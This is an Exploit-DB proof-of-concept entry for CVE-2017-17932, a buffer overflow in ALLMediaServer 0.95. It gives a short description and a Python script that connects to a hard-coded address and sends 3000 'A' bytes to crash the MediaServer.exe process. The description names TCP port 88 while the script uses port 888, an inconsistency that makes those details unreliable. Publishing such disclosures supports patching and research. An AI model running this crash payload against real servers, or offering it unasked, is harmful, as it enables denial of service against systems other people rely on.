ALLMediaServer 0.95 – Buffer Overflow (PoC)

  • Author: Aloyce J. Makalanga
    Date: 2017-12-27
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/43406/
  • # Exploit Title: Buffer overflow in ALLPlayer ALLMediaServer 0.95 and earlier
    # CVE: CVE-2017-17932
    # Date: 27-12-2017 
    # Exploit Author: Aloyce J. Makalanga
    # Contact: https://twitter.com/aloycemjr
    # Vendor Homepage: http://www.allmediaserver.org/
    # Category: webapps
    # Attack Type: Remote
    # Impact: Code execution and/or Denial of Service

    #1. Description
    #
    #A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause a denial of service on the victim machine via a long string sent to TCP port 88. To exploit this vulnerability, an attacker must connect to the server and send a long, malicious string.
    #
    #2. Proof of Concept
    #

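    #!/usr/bin/python

    #NOTE: I found this bug via patch-diffing and I had IDA Pro set up as my Just-In-Time debugger at the time of the crash but any debugger should work.

    import socket

    def main():
        # Open a TCP connection to the ALLMediaServer listener on the test host
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.205.131', 888))

        # The long string from the description: 3000 "A" bytes
        # (bytes literal so the script behaves the same on Python 2 and 3)
        buffer = b"A" * 3000
        s.send(buffer)
        s.close()

    if __name__ == '__main__':
        main()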